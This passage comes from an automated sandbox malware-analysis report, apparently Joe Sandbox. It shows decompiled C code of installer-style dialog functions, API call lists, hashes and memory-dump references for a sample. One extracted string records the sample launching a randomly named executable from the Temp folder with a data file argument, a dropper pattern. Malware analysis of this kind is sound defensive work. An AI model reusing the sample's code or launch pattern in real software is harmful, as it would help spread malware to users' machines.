                                    0x00402928
                                    0x0040292b
                                    0x0040292e
                                    0x0040292e
                                    0x00402c2d
                                    0x00402c39

                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: FileFindFirst
                                    • String ID:
                                    • API String ID: 1974802433-0
                                    • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                    • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                    • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                    • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 96%
                                    			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                    0x00405038
                                    0x00405051
                                    0x00405056
                                    0x0040505e
                                    0x00405064
                                    0x0040507a
                                    0x0040507d
                                    0x004052a8
                                    0x004052af
                                    0x004052c3
                                    0x004052b1
                                    0x004052b3
                                    0x004052b6
                                    0x004052b7
                                    0x004052be
                                    0x004052be
                                    0x004052cf
                                    0x004052dd
                                    0x004052e0
                                    0x004052f6
                                    0x0040536b
                                    0x0040536e
                                    0x00405370
                                    0x0040537a
                                    0x00405388
                                    0x00405388
                                    0x0040538a
                                    0x00405394
                                    0x0040539a
                                    0x0040539d
                                    0x004053a0
                                    0x004053bb
                                    0x004053a2
                                    0x004053ac
                                    0x004053ac
                                    0x004053a0
                                    0x00405394
                                    0x00000000
                                    0x0040536e
                                    0x004052fb
                                    0x00405306
                                    0x0040530b
                                    0x00405312
                                    0x00405317
                                    0x0040531b
                                    0x00405326
                                    0x00405326
                                    0x0040532a
                                    0x0040532e
                                    0x00405332
                                    0x00405345
                                    0x00405334
                                    0x00405334
                                    0x0040533b
                                    0x00405341
                                    0x0040533d
                                    0x0040533d
                                    0x0040533d
                                    0x0040533b
                                    0x00405349
                                    0x0040534b
                                    0x0040535e
                                    0x00405361
                                    0x00405364
                                    0x00405364
                                    0x0040532e
                                    0x00000000
                                    0x0040531b
                                    0x004052fd
                                    0x00405304
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004053be
                                    0x004053be
                                    0x004053c5
                                    0x00405436
                                    0x0040543e
                                    0x00405446
                                    0x00405446
                                    0x0040544f
                                    0x00405451
                                    0x00405458
                                    0x0040545b
                                    0x0040545b
                                    0x00405461
                                    0x00405468
                                    0x0040546b
                                    0x0040546b
                                    0x00405471
                                    0x00405477
                                    0x0040547d
                                    0x0040547d
                                    0x0040548a
                                    0x004055eb
                                    0x004055f2
                                    0x0040560f
                                    0x00405615
                                    0x00405627
                                    0x00405627
                                    0x00000000
                                    0x00405490
                                    0x00405492
                                    0x00405497
                                    0x0040549c
                                    0x004054a1
                                    0x004054a3
                                    0x004054a3
                                    0x004054a4
                                    0x004054a5
                                    0x004054a7
                                    0x004054a7
                                    0x004054af
                                    0x004054f0
                                    0x004054f2
                                    0x00405502
                                    0x00405505
                                    0x0040550a
                                    0x00405511
                                    0x00405514
                                    0x004055b6
                                    0x004055bf
                                    0x004055c7
                                    0x004055c7
                                    0x004055d5
                                    0x004055e6
                                    0x004055e6
                                    0x00000000
                                    0x004055d5
                                    0x0040551a
                                    0x0040551d
                                    0x00405523
                                    0x00405528
                                    0x0040552a
                                    0x0040552c
                                    0x00405532
                                    0x00405539
                                    0x0040553e
                                    0x00405545
                                    0x00405548
                                    0x00405548
                                    0x0040554f
                                    0x0040555b
                                    0x0040555f
                                    0x00405561
                                    0x00405561
                                    0x00405551
                                    0x00405553
                                    0x00405553
                                    0x00405581
                                    0x0040558d
                                    0x0040559c
                                    0x0040559c
                                    0x0040559e
                                    0x004055a1
                                    0x004055aa
                                    0x00000000
                                    0x004054b1
                                    0x004054bc
                                    0x004054bf
                                    0x004054c4
                                    0x004054c6
                                    0x004054ca
                                    0x004054da
                                    0x004054e4
                                    0x004054e6
                                    0x004054e9
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004054cc
                                    0x004054cc
                                    0x004054d2
                                    0x004054d4
                                    0x004054d4
                                    0x004054d5
                                    0x004054d6
                                    0x00000000
                                    0x004054cc
                                    0x004054af
                                    0x0040548a
                                    0x004053cd
                                    0x00000000
                                    0x004053e3
                                    0x004053ed
                                    0x004053f2
                                    0x00000000
                                    0x00000000
                                    0x00405404
                                    0x00405409
                                    0x00405415
                                    0x00405415
                                    0x00405417
                                    0x00405426
                                    0x00405428
                                    0x0040542c
                                    0x0040542f
                                    0x00000000
                                    0x0040542f
                                    0x004053cd
                                    0x00405083
                                    0x00405088
                                    0x00405091
                                    0x00405098
                                    0x004050aa
                                    0x004050b5
                                    0x004050bb
                                    0x004050c9
                                    0x004050dd
                                    0x004050e2
                                    0x004050ef
                                    0x004050f4
                                    0x0040510a
                                    0x0040511b
                                    0x00405128
                                    0x00405128
                                    0x0040512b
                                    0x00405131
                                    0x00405133
                                    0x00405136
                                    0x0040513b
                                    0x00405140
                                    0x00405142
                                    0x00405142
                                    0x00405162
                                    0x00405162
                                    0x00405164
                                    0x00405165
                                    0x0040516a
                                    0x00405170
                                    0x00405174
                                    0x00405179
                                    0x00405181
                                    0x00405185
                                    0x0040518a
                                    0x0040518f
                                    0x00405197
                                    0x0040519a
                                    0x0040526a
                                    0x0040527d
                                    0x00000000
                                    0x004051a0
                                    0x004051a3
                                    0x004051a6
                                    0x004051a9
                                    0x004051a9
                                    0x004051af
                                    0x004051b8
                                    0x004051bb
                                    0x004051bf
                                    0x004051c2
                                    0x004051c5
                                    0x004051ce
                                    0x004051d7
                                    0x004051da
                                    0x004051dd
                                    0x004051e0
                                    0x0040521e
                                    0x00405249
                                    0x00405220
                                    0x0040522f
                                    0x0040522f
                                    0x004051e2
                                    0x004051e5
                                    0x004051f3
                                    0x004051fd
                                    0x00405205
                                    0x0040520c
                                    0x00405217
                                    0x00405217
                                    0x004051e0
                                    0x0040524f
                                    0x00405250
                                    0x0040525c
                                    0x0040525c
                                    0x00405268
                                    0x00405283
                                    0x00405286
                                    0x004052a3
                                    0x00000000
                                    0x00405288
                                    0x0040528d
                                    0x00405296
                                    0x00405629
                                    0x0040563b
                                    0x0040563b
                                    0x00405286
                                    0x00000000
                                    0x00405268
                                    0x0040519a

                                    APIs
                                    • GetDlgItem.USER32(?,000003F9), ref: 00405049
                                    • GetDlgItem.USER32(?,00000408), ref: 00405054
                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                    • LoadImageW.USER32 ref: 004050B5
                                    • SetWindowLongW.USER32 ref: 004050CE
                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                    • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                    • DeleteObject.GDI32(00000000), ref: 0040512B
                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                      • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                    • SetWindowLongW.USER32 ref: 0040527D
                                    • ShowWindow.USER32(?,00000005), ref: 0040528D
                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                    • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                    • GlobalFree.KERNEL32(?), ref: 0040546B
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                    • ShowWindow.USER32(?,00000000), ref: 00405615
                                    • GetDlgItem.USER32(?,000003FE), ref: 00405620
                                    • ShowWindow.USER32(00000000), ref: 00405627
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                    • String ID: $M$N
                                    • API String ID: 2564846305-813528018
                                    • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                    • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                    • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                    • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 91%
                                    			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}


















                                    0x00404795
                                    0x004048c2
                                    0x0040491f
                                    0x00404923
                                    0x004049f0
                                    0x004049f2
                                    0x004049f2
                                    0x004049f8
                                    0x004049f8
                                    0x004049fb
                                    0x00000000
                                    0x00404a02
                                    0x00404931
                                    0x00404937
                                    0x00404941
                                    0x0040494c
                                    0x0040494f
                                    0x00404952
                                    0x0040495d
                                    0x00404960
                                    0x00404967
                                    0x00404974
                                    0x00404985
                                    0x0040498b
                                    0x00404993
                                    0x004049a1
                                    0x004049a7
                                    0x004049a7
                                    0x00404967
                                    0x004049b1
                                    0x00000000
                                    0x004049bc
                                    0x004049c0
                                    0x004049d0
                                    0x004049d0
                                    0x004049d6
                                    0x004049e2
                                    0x004049e2
                                    0x00000000
                                    0x004049e6
                                    0x004049b1
                                    0x004048cd
                                    0x00000000
                                    0x004048df
                                    0x004048e4
                                    0x004048ea
                                    0x00000000
                                    0x00000000
                                    0x00404913
                                    0x00404915
                                    0x0040491a
                                    0x00000000
                                    0x0040491a
                                    0x004048cd
                                    0x0040479b
                                    0x0040479e
                                    0x004047a3
                                    0x004047b4
                                    0x004047b4
                                    0x004047bc
                                    0x004047bf
                                    0x004047c3
                                    0x004047c6
                                    0x004047ca
                                    0x004047cd
                                    0x004047d0
                                    0x004047d3
                                    0x004047da
                                    0x004047dc
                                    0x004047dc
                                    0x004047e6
                                    0x004047f3
                                    0x004047fd
                                    0x00404802
                                    0x00404805
                                    0x0040480a
                                    0x00404821
                                    0x00404828
                                    0x0040483b
                                    0x0040483e
                                    0x00404852
                                    0x00404859
                                    0x0040485e
                                    0x00404863
                                    0x00404863
                                    0x00404871
                                    0x0040487f
                                    0x00404891
                                    0x00404896
                                    0x004048a6
                                    0x004048a8
                                    0x00000000

                                    APIs
                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                    • GetDlgItem.USER32(?,000003E8), ref: 00404835
                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                    • GetSysColor.USER32 ref: 00404863
                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                    • lstrlenW.KERNEL32(?), ref: 00404884
                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                    • GetDlgItem.USER32(?,0000040A), ref: 004048FF
                                    • SendMessageW.USER32(00000000), ref: 00404906
                                    • GetDlgItem.USER32(?,000003E8), ref: 00404931
                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                    • LoadCursorW.USER32 ref: 00404982
                                    • SetCursor.USER32(00000000), ref: 00404985
                                    • LoadCursorW.USER32 ref: 0040499E
                                    • SetCursor.USER32(00000000), ref: 004049A1
                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                    Strings
                                    • N, xrefs: 0040491F
                                    • "C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx, xrefs: 00404960
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
